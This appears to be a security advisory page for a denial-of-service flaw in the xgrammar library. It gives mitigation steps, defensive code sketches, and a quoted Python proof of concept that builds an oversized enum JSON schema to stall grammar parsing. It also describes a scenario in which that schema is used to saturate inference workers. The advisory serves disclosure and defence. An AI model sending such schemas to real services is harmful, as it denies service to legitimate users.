CVE-2025-58446: xgrammar: DoS via oversized JSON schema grammar parsing
GHSA-9q5r-wfvf-rr7f | MEDIUM | PoC AVAILABLE | CISA: TRACK*
xgrammar v0.1.23 has a DoS vulnerability where crafted large JSON schemas (>100k chars) trigger a pathologically slow grammar optimizer, blocking model inference for minutes per request. Any model serving endpoint that accepts user-defined JSON schemas for constrained/structured output is directly exploitable with a trivial PoC. Patch to v0.1.24 immediately; if delayed, enforce schema byte-size limits at the API gateway before requests reach the inference layer.
What is the risk?
Effective risk is medium-high for exposed inference endpoints, despite the medium CVSS. The attack surface is any API that accepts caller-supplied JSON schemas for structured generation — a common pattern in agentic and enterprise LLM deployments. EPSS is very low (0.00091), suggesting no current active exploitation, but the PoC is fully public and requires zero AI/ML expertise to execute. Impact is availability, not confidentiality — a single malicious request can monopolize an inference thread for minutes, enabling throughput starvation against multi-tenant or high-availability deployments.
What systems are affected?
| Package | Ecosystem | Vulnerable Range | Patched |
|---|---|---|---|
| XGrammar | pip | = 0.1.23 | 0.1.24 |
If you run XGrammar 0.1.23, you are affected.
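A quick way to check an environment against the table above is to compare the installed package version with the listed vulnerable range. The sketch below is illustrative only: the helper names `is_vulnerable` and `installed_xgrammar_version` are hypothetical, and the set of vulnerable versions is copied from the table rather than from any official feed.

```python
from importlib import metadata
from typing import Optional

# Assumption: the vulnerable range is exactly the version listed in the table above.
VULNERABLE_VERSIONS = {"0.1.23"}


def is_vulnerable(version: str) -> bool:
    """Return True if the version string is in the listed vulnerable range."""
    return version.strip() in VULNERABLE_VERSIONS


def installed_xgrammar_version() -> Optional[str]:
    """Return the installed xgrammar version, or None if it is not installed."""
    try:
        return metadata.version("xgrammar")
    except metadata.PackageNotFoundError:
        return None


if __name__ == "__main__":
    version = installed_xgrammar_version()
    if version is None:
        print("xgrammar is not installed in this environment")
    elif is_vulnerable(version):
        print(f"xgrammar {version} is affected; upgrade to 0.1.24 or later")
    else:
        print(f"xgrammar {version} is not in the listed vulnerable range")
```

Run this inside each serving image or virtual environment, since xgrammar is often pulled in transitively by an inference framework rather than installed directly.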
What should I do?
5 steps:
1. **Patch**: Upgrade xgrammar to v0.1.24 or later. The fix speeds up the grammar optimizer and disables some slow optimizations for large grammars.
2. **Short-term workaround**: Enforce a maximum schema size limit (e.g., 50KB) at the API gateway or application layer before calling Grammar.from_json_schema().
3. **Rate limiting**: Apply per-client rate limiting on constrained generation endpoints, independent of token-based limits.
4. **Detection**: Alert on grammar parsing durations exceeding 10 seconds. Durations this long are anomalous and may indicate exploitation.
5. **Audit exposure**: Identify all internal services or APIs that accept caller-supplied JSON schemas and pass them directly to xgrammar without validation.
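The workaround and detection steps above can be combined in a small wrapper around the grammar compilation call. This is a minimal sketch, not xgrammar's own API: `guarded_compile`, `SchemaTooLargeError`, and the logger name are hypothetical, the 50,000-byte limit and 10-second threshold are the example values from the steps, and the compile function is passed in so the wrapper does not depend on any particular library version.

```python
import logging
import time
from typing import Callable, TypeVar

T = TypeVar("T")
logger = logging.getLogger("schema_guard")  # hypothetical logger name

MAX_SCHEMA_BYTES = 50_000     # example limit from the workaround step
SLOW_COMPILE_SECONDS = 10.0   # alert threshold from the detection step


class SchemaTooLargeError(ValueError):
    """Raised when a caller-supplied schema exceeds the configured size limit."""


def guarded_compile(
    schema_json: str,
    compile_fn: Callable[[str], T],
    max_bytes: int = MAX_SCHEMA_BYTES,
    slow_seconds: float = SLOW_COMPILE_SECONDS,
) -> T:
    """Reject oversized schemas, then time the compilation and log slow runs."""
    size = len(schema_json.encode("utf-8"))
    if size > max_bytes:
        # Fail fast, before any grammar work is attempted.
        raise SchemaTooLargeError(f"schema is {size} bytes; limit is {max_bytes}")

    start = time.monotonic()
    try:
        return compile_fn(schema_json)
    finally:
        elapsed = time.monotonic() - start
        if elapsed > slow_seconds:
            # This fires only after compilation returns; it does not interrupt it.
            logger.warning(
                "grammar compilation took %.1fs for a %d-byte schema", elapsed, size
            )
```

In a service that uses xgrammar, the call site would presumably look like `guarded_compile(schema_json, xgr.Grammar.from_json_schema)`. Because the warning is emitted only once compilation finishes, the size check is what actually bounds the work; the timing log is there for alerting.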
What does CISA's SSVC say?
Source: CISA Vulnrichment (SSVC v2.0). Decision based on the CISA Coordinator decision tree.
Frequently Asked Questions
What is CVE-2025-58446?
xgrammar v0.1.23 has a DoS vulnerability where crafted large JSON schemas (>100k chars) trigger a pathologically slow grammar optimizer, blocking model inference for minutes per request. Any model serving endpoint that accepts user-defined JSON schemas for constrained/structured output is directly exploitable with a trivial PoC. Patch to v0.1.24 immediately; if delayed, enforce schema byte-size limits at the API gateway before requests reach the inference layer.
Is CVE-2025-58446 actively exploited?
There is no indication of active exploitation: the EPSS score is very low (0.00091). However, proof-of-concept exploit code is publicly available for CVE-2025-58446, which increases the risk of exploitation.
How to fix CVE-2025-58446?
1. **Patch**: Upgrade xgrammar to v0.1.24 or later. The fix speeds up the grammar optimizer and disables some slow optimizations for large grammars.
2. **Short-term workaround**: Enforce a maximum schema size limit (e.g., 50KB) at the API gateway or application layer before calling Grammar.from_json_schema().
3. **Rate limiting**: Apply per-client rate limiting on constrained generation endpoints, independent of token-based limits.
4. **Detection**: Alert on grammar parsing durations exceeding 10 seconds. Durations this long are anomalous and may indicate exploitation.
5. **Audit exposure**: Identify all internal services or APIs that accept caller-supplied JSON schemas and pass them directly to xgrammar without validation.
What systems are affected by CVE-2025-58446?
This vulnerability affects the following AI/ML architecture patterns: model serving, structured output pipelines, LLM inference APIs, agentic tool-calling pipelines.
What is the CVSS score for CVE-2025-58446?
No numeric CVSS score is listed here; the advisory is rated Medium severity.
What is the AI security impact?
Affected AI Architectures
- model serving
- structured output pipelines
- LLM inference APIs
- agentic tool-calling pipelines
MITRE ATLAS Techniques
- AML.T0029 Denial of AI Service
- AML.T0034 Cost Harvesting
- AML.T0049 Exploit Public-Facing Application
What are the technical details?
Original Advisory
### Summary
The provided grammar would fit in the context window of most models, but takes minutes to process in 0.1.23. In testing with 0.1.16 the parser worked fine, so this seems to be a regression caused by the Earley parser.

### Details
A full reproducer is provided in the PoC section. The resulting grammar is around 70k tokens, and the grammar parsing itself (with the models I checked) took significantly longer than the LLM processing, meaning this can be used to DoS model providers.

### Patch
This problem is caused by the grammar optimizer introduced in v0.1.23 being too slow. It only happens for very large grammars (>100k characters), like the one below. v0.1.24 solved this problem by optimizing the speed of the grammar optimizer and disabling some slow optimizations for large grammars. Thanks to @Seven-Streams

### PoC
```
import string
import random

def enum_schema(size=10000, str_len=10):
    # One large enum of random uppercase strings, referenced by eight properties.
    enum = {"enum": ["".join(random.choices(string.ascii_uppercase, k=str_len)) for _ in range(size)]}
    schema = {
        "definitions": {
            "colorEnum": enum
        },
        "type": "object",
        "properties": {
            "color1": {"$ref": "#/definitions/colorEnum"},
            "color2": {"$ref": "#/definitions/colorEnum"},
            "color3": {"$ref": "#/definitions/colorEnum"},
            "color4": {"$ref": "#/definitions/colorEnum"},
            "color5": {"$ref": "#/definitions/colorEnum"},
            "color6": {"$ref": "#/definitions/colorEnum"},
            "color7": {"$ref": "#/definitions/colorEnum"},
            "color8": {"$ref": "#/definitions/colorEnum"}
        },
        "required": ["color1", "color2"]
    }
    return schema

# test_schema is the helper shown below; define it before running these lines.
schema_enum = enum_schema()
print(schema_enum)
print(test_schema(schema_enum, {}))
```
where:
```
import json

import xgrammar as xgr
# Assumed import path; the advisory does not show where this helper comes from.
from xgrammar.testing import _is_grammar_accept_string

def test_schema(schema, instance):
    grammar = xgr.Grammar.from_json_schema(
        json.dumps(schema),
        strict_mode=True
    )
    return _is_grammar_accept_string(grammar, json.dumps(instance))
```

### Impact
DoS
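To relate the PoC to the ">100k characters" threshold mentioned in the patch notes, the size of its enum definition can be measured without involving xgrammar at all. The following sketch rebuilds only the enum list with the PoC's default parameters and reports its serialized length; the function name `enum_schema_size` is hypothetical.

```python
import json
import random
import string


def enum_schema_size(size: int = 10_000, str_len: int = 10) -> int:
    """Return the serialized length, in characters, of the PoC's enum definition."""
    enum = ["".join(random.choices(string.ascii_uppercase, k=str_len)) for _ in range(size)]
    return len(json.dumps({"enum": enum}))


# The strings are random, but the length depends only on size and str_len.
print(enum_schema_size())
```

With the defaults this comes to roughly 140,000 characters, so the enum definition alone crosses the 100k-character threshold and would also be rejected by a 50KB gateway limit.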
Exploitation Scenario
An adversary targeting a multi-tenant LLM API (e.g., an enterprise copilot or structured data extraction service) crafts a JSON schema with thousands of enum values totaling over 100k characters — trivially generated with the public PoC. They submit this as the response_format schema in a constrained generation request. The xgrammar optimizer enters a slow computation path, blocking the inference thread for several minutes. By issuing a small number of concurrent requests (5–10), the attacker can saturate all inference workers, causing complete service unavailability for legitimate users. The attack costs pennies in compute and requires no authentication bypass or specialized knowledge, only awareness of the library version and the public PoC.
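Because the scenario above relies on a handful of requests from one caller, the per-client rate limiting recommended earlier can blunt it even before a patch is deployed. Below is a minimal in-memory sketch of a sliding-window limiter; the class name, the `client_id` key, and the injectable clock are all illustrative assumptions, and a production deployment would more likely enforce this at the gateway or in a shared store.

```python
import time
from collections import defaultdict, deque
from typing import Callable, Deque, Dict


class SlidingWindowLimiter:
    """Allow at most `max_requests` per client within `window_seconds`."""

    def __init__(
        self,
        max_requests: int,
        window_seconds: float,
        clock: Callable[[], float] = time.monotonic,
    ) -> None:
        self.max_requests = max_requests
        self.window_seconds = window_seconds
        self._clock = clock  # injectable so the limiter can be tested without sleeping
        self._hits: Dict[str, Deque[float]] = defaultdict(deque)

    def allow(self, client_id: str) -> bool:
        """Record the request and return True, or return False if over the limit."""
        now = self._clock()
        hits = self._hits[client_id]
        # Drop timestamps that have aged out of the window.
        while hits and now - hits[0] >= self.window_seconds:
            hits.popleft()
        if len(hits) >= self.max_requests:
            return False
        hits.append(now)
        return True
```

A constrained-generation handler would call `allow(client_id)` before compiling the schema and return an HTTP 429 when it yields `False`. Keying the limit on schema-bearing requests rather than on tokens matters here, since the expensive work happens before any tokens are generated.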
Weaknesses (CWE)
CWE-770 — Allocation of Resources Without Limits or Throttling: The product allocates a reusable resource or group of resources on behalf of an actor without imposing any intended restrictions on the size or number of resources that can be allocated.
- [Requirements] Clearly specify the minimum and maximum expectations for capabilities, and dictate which behaviors are acceptable when resource allocation reaches limits.
- [Architecture and Design] Limit the amount of resources that are accessible to unprivileged users. Set per-user limits for resources. Allow the system administrator to define these limits. Be careful to avoid CWE-410.
Source: MITRE CWE corpus.
References
- github.com/advisories/GHSA-9q5r-wfvf-rr7f
- github.com/mlc-ai/xgrammar/commit/ced69c3ad2f8f61b516cc278a342e7c644383e27
- github.com/mlc-ai/xgrammar/security/advisories/GHSA-9q5r-wfvf-rr7f
- nvd.nist.gov/vuln/detail/CVE-2025-58446
- github.com/ARPSyndicate/cve-scores (tagged: Exploit)
- github.com/fkie-cad/nvd-json-data-feeds (tagged: Exploit)
Related Vulnerabilities
- CVE-2025-57809 (7.5) xgrammar: uncontrolled recursion in grammar parsing causes DoS. Same package: xgrammar
- CVE-2025-32381 (6.5) xgrammar: unbounded grammar cache causes LLM server DoS. Same package: xgrammar
- CVE-2026-25048 xgrammar: security flaw enables exploitation. Same package: xgrammar
- CVE-2026-33660 (10.0) TensorFlow: type confusion NPD in tensor conversion. Same attack type: DoS
- CVE-2023-25668 (9.8) TensorFlow: unauthenticated RCE via heap buffer overflow. Same attack type: DoS